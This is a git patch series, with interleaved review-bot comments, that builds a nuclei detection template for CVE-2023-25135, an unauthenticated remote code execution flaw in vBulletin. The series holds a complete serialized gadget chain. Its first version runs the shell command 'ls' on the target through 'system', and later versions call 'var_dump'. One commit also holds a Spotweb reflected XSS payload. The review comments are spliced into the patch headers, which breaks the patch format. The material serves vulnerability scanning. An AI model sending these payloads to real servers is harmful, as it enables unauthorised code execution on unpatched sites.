From f2890ae2fac207e3503de76ce91ff90366697768 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 9 May 2023 22:10:11 +0530
Subject: [PATCH 1/8] Create CVE-2023-25135.yaml

---
 http/cves/2023/CVE-2023-25135.yaml | 48 ++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-25135.yaml

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
new file mode 100644
index 0000000000..910315d910
--- /dev/null
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -0,0 +1,48 @@
+id: CVE-2023-25135
+
+info:
+  name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
+  reference:
+    - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
+    - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25135
+    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
+  remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-502
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"Powered By vBulletin"
+    google-query: http.component:"vBulletin"
+  tags: cve,cve2023,vbulletin,rce,kev
+
+requests:
+  - raw:
+      - |
+        POST /ajax/api/user/save HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
+
+        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D={{randstr}}&user%5Bpassword%5D={{randstr}}&user%5Bsearchprefs%5D=a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22googlelogin_vendor_autoload%22%3A0%3A%7B%7Di%3A1%3BO%3A32%3A%22Monolog%5CHandler%5CSyslogUdpHandler%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00socket%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A4%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A-1%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A36%3A%22echo+n8ZCwFfp%3A%3A%3B+ls%3B+echo+%3A%3An8ZCwFfp%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A8%3A%22%00%2A%00level%22%3BN%3Bs%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A-1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D&user%5Busername%5D=toto&userfield=&userid=0
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "n8ZCwFfp::"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

From b3dc6cf70a4380ccb9b90105c21774fd843f5804 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 9 May 2023 22:42:10 +0530
Subject: [PATCH 2/8] change in query

---
 http/cves/2023/CVE-2023-25135.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 910315d910..006e033842 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -19,8 +19,8 @@ info:
   metadata:
     max-request: 1
     verified: true
-    shodan-query: title:"Powered By vBulletin"
-    google-query: http.component:"vBulletin"
+    google-query: intext:"Powered By vBulletin"
+    shodan-query: http.component:"vBulletin"
   tags: cve,cve2023,vbulletin,rce,kev
 
 requests:

From 58f7db754fe8771787159082a47571d10bc78053 Mon Sep 17 00:00:00 2001
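Review bot: `classification` carries `cvss-metrics`, `cvss-score` and `cwe-id` but no `cve-id`, so the CVE identifier lives only in the top-level `id`; add `cve-id: CVE-2023-25135` under `classification` next to `cwe-id: CWE-502`. The `kev` tag asserts a CISA Known Exploited Vulnerabilities listing, and none of the four references cited is the KEV catalog, so that claim cannot be confirmed from this patch — verify it or drop the tag. The `searchprefs` gadget chain in this revision ends in `system` with the command `echo n8ZCwFfp::; ls; echo ::n8ZCwFfp`, i.e. the template proves the bug by executing a command on the target; a scanner template should prefer a side-effect-free sink such as `var_dump` of a marker string, which is what a later patch in this series switches to.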
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 10 May 2023 01:00:43 +0530
Subject: [PATCH 3/8] protocol-update

---
 http/cves/2023/CVE-2023-25135.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 006e033842..007b9712c7 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -18,12 +18,12 @@ info:
     cwe-id: CWE-502
   metadata:
     max-request: 1
-    verified: true
+    verified: "true"
     google-query: intext:"Powered By vBulletin"
     shodan-query: http.component:"vBulletin"
   tags: cve,cve2023,vbulletin,rce,kev
 
-requests:
+http:
   - raw:
       - |
         POST /ajax/api/user/save HTTP/1.1

From cba7f8b5e5dce238e8b03474ea1732e4b351be38 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 10 May 2023 17:51:16 +0530
Subject: [PATCH 4/8] changing from system to var_dump

---
 http/cves/2023/CVE-2023-25135.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 007b9712c7..8307e7677e 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -23,21 +23,21 @@ info:
     shodan-query: http.component:"vBulletin"
   tags: cve,cve2023,vbulletin,rce,kev
 
-http:
+requests:
   - raw:
       - |
         POST /ajax/api/user/save HTTP/1.1
         Content-Type: application/x-www-form-urlencoded
 
-        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D={{randstr}}&user%5Bpassword%5D={{randstr}}&user%5Bsearchprefs%5D=a%3A2%3A%7Bi%3A0%3BO%3A27%3A%22googlelogin_vendor_autoload%22%3A0%3A%7B%7Di%3A1%3BO%3A32%3A%22Monolog%5CHandler%5CSyslogUdpHandler%22%3A1%3A%7Bs%3A9%3A%22%00%2A%00socket%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A4%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A-1%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A36%3A%22echo+n8ZCwFfp%3A%3A%3B+ls%3B+echo+%3A%3An8ZCwFfp%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A8%3A%22%00%2A%00level%22%3BN%3Bs%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A-1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D&user%5Busername%5D=toto&userfield=&userid=0
-
+        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "n8ZCwFfp::"
-
+          - 'string(14)'
+          - '"CVE-2023-25135"'
+        condition: and
       - type: word
         part: header
         words:

From dc3180fd24892378b31dec96812d05759f4d71b1 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 10 May 2023 19:14:55 +0530
Subject: [PATCH 5/8] protocol -update

---
 http/cves/2023/CVE-2023-25135.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 8307e7677e..61b15d6b3c 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -23,7 +23,7 @@ info:
     shodan-query: http.component:"vBulletin"
   tags: cve,cve2023,vbulletin,rce,kev
 
-requests:
+http:
   - raw:
       - |
         POST /ajax/api/user/save HTTP/1.1

From 36819b63eb32314279e8b2cc55d22d7364c891a3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 10 May 2023 20:43:56 +0530
Subject: [PATCH 6/8] minor -update

---
 http/cves/2023/CVE-2023-25135.yaml | 46 +++++++++++++++---------------
 1 file changed, 23 insertions(+), 23 deletions(-)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 61b15d6b3c..bc569c3251 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
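Review bot: The body matcher splits the expected `var_dump` output into two words, `'string(14)'` and `'"CVE-2023-25135"'`, but `"CVE-2023-25135"` (quotes included) is also a literal inside the request body, so any response that reflects the submitted `searchprefs` value — a validation error, say — satisfies the second word and leaves the generic `string(14)` as the only discriminator. Match the exact dump line as one word instead, `- 'string(14) "CVE-2023-25135"'`, after which `condition: and` is no longer needed; this assumes the dump reaches the JSON body unescaped, which should be confirmed against a live target. The rewritten body also carries raw `{`, `}`, `"`, `\` and `*` in an `application/x-www-form-urlencoded` body where the first revision percent-encoded them (`%7B`, `%22`, `%5C`, `%2A`); since nuclei treats `{{ … }}` as expression syntax and intermediaries may normalise such bodies, the encoded form is the safer one to keep. Replacing `system` with `var_dump` is the right call: the template now proves deserialization without running a command on the target.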
@@ -1,47 +1,47 @@
-id: CVE-2023-25135
+id: CVE-2021-40970
 
 info:
-  name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
-  author: iamnoooob,rootxharsh,pdresearch
-  severity: critical
+  name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
+  author: theamanrawat
+  severity: medium
   description: |
-    vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
+    Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.
+  remediation: Fixed in version 1.5.2
   reference:
-    - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
-    - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-25135
-    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
-  remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
+    - https://github.com/spotweb/spotweb/
+    - https://github.com/spotweb/spotweb/issues/711
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40970
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
-    cwe-id: CWE-502
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-40970
+    cwe-id: CWE-79
   metadata:
-    max-request: 1
     verified: "true"
-    google-query: intext:"Powered By vBulletin"
-    shodan-query: http.component:"vBulletin"
-  tags: cve,cve2023,vbulletin,rce,kev
+    shodan-query: title:"SpotWeb - overview"
+  tags: cve,cve2021,xss,spotweb,unauthenticated
 
 http:
   - raw:
       - |
-        POST /ajax/api/user/save HTTP/1.1
+        POST /install.php?page=1 HTTP/1.1
+        Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
+        settingsform[username]=pdteam'+onclick='alert(document.domain)
+
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - 'string(14)'
-          - '"CVE-2023-25135"'
-        condition: and
+          - "onclick='alert(document.domain)"
+          - "Spotweb"
+
       - type: word
         part: header
         words:
-          - "application/json"
+          - "text/html"
 
       - type: status
         status:
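Review bot: This hunk overwrites `http/cves/2023/CVE-2023-25135.yaml` with a template whose `id` and `cve-id` are `CVE-2021-40970` (a Spotweb reflected XSS), so the file path, identifier and content no longer agree and the vBulletin template disappears from the tree; the subject `minor -update` does not describe that. If the Spotweb template is intended it belongs under `http/cves/2021/CVE-2021-40970.yaml`, and if not, this commit should be dropped from the series. The following commit restores the vBulletin content line for line, so the pair should be squashed away before merge rather than carried as a replace-and-revert in history.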
From 8de6c0cb813645336a0a0e6e77d3f7bf91bbc372 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 10 May 2023 20:45:19 +0530
Subject: [PATCH 7/8] Update CVE-2023-25135.yaml

---
 http/cves/2023/CVE-2023-25135.yaml | 46 +++++++++++++++---------------
 1 file changed, 23 insertions(+), 23 deletions(-)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index bc569c3251..61b15d6b3c 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -1,47 +1,47 @@
-id: CVE-2021-40970
+id: CVE-2023-25135
 
 info:
-  name: Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)
-  author: theamanrawat
-  severity: medium
+  name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
   description: |
-    Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the username parameter.
-  remediation: Fixed in version 1.5.2
+    vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
   reference:
-    - https://github.com/spotweb/spotweb/
-    - https://github.com/spotweb/spotweb/issues/711
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-40970
+    - https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
+    - https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-25135
+    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
+  remediation: The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cve-id: CVE-2021-40970
-    cwe-id: CWE-79
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-502
   metadata:
+    max-request: 1
     verified: "true"
-    shodan-query: title:"SpotWeb - overview"
-  tags: cve,cve2021,xss,spotweb,unauthenticated
+    google-query: intext:"Powered By vBulletin"
+    shodan-query: http.component:"vBulletin"
+  tags: cve,cve2023,vbulletin,rce,kev
 
 http:
   - raw:
       - |
-        POST /install.php?page=1 HTTP/1.1
-        Host: {{Hostname}}
+        POST /ajax/api/user/save HTTP/1.1
         Content-Type: application/x-www-form-urlencoded
 
-        settingsform[username]=pdteam'+onclick='alert(document.domain)
-
+        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "onclick='alert(document.domain)"
-          - "Spotweb"
-
+          - 'string(14)'
+          - '"CVE-2023-25135"'
+        condition: and
       - type: word
         part: header
         words:
-          - "text/html"
+          - "application/json"
 
       - type: status
         status:

From 34cbb997e02bc5098f3e82952731749f5cb23341 Mon Sep 17 00:00:00 2001
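Review bot: The restored `classification` block removes `cve-id: CVE-2021-40970` without putting `cve-id: CVE-2023-25135` in its place, so the vBulletin template again carries its CVE only in the top-level `id`; add `cve-id: CVE-2023-25135` next to `cwe-id: CWE-502`. This commit is a line-for-line revert of the previous one, and the two should be squashed away so the series does not carry a replace-and-revert pair. The `kev` tag reinstated here still has no KEV-catalog reference backing it among the four listed; confirm the listing or remove the tag.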
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Wed, 10 May 2023 20:46:40 +0530
Subject: [PATCH 8/8] Update CVE-2023-25135.yaml

---
 http/cves/2023/CVE-2023-25135.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 61b15d6b3c..c3dc3d40a2 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -27,6 +27,7 @@ http:
   - raw:
       - |
         POST /ajax/api/user/save HTTP/1.1
+        Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0